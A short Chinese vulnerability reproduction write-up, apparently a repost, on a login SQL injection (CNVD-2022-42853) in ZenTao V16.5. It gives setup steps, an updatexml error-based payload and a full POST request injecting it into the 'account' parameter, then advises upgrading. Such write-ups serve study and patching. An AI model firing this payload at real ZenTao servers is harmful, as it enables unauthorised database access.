1、简介

禅道是一款专业的国产开源研发项目管理软件，集产品管理，项目管理， 质量管理，文档管理，组织管理和事务管理于一体，完整覆盖了研发项目管理的核心流程，管理思想基于国际流行的敏捷项目管理方法-Scrum，在遵循其价值观的基础上，结合国内项目研发的现状，整合了任务管理，需要管理，Bug管理，用例管理等多种功能，覆盖软件从计划到发布的整个生命周期。

2、漏洞详情

禅道V16.5未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。

3、环境搭建

下载环境：

https://www.zentao.net/dl/zentao/16.5/ZenTaoPMS.16.5.win64.exe

下载后双击运行，进入目录运行srart.exe

接着我们启动禅道，访问禅道。

4、漏洞复现

4.1、手工注入复现一

报错型注入Payload：

admin' and updatexml(1,concat(0x7e,(user),0x7e),1) and '1'='1  

4.2、利用Burp抓包

POC如下：

POST /zentao/user-login.html HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded
account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%271

我们抓取的数据包如下：

我们将红框中的内容替换：

5、修复方式

升级为最新版禅道。

(本文只做交流学习，切勿违法犯罪！！！)

原文始发于微信公众号（LK安全）：禅道V16.5SQL注入 （CNVD-2022-42853）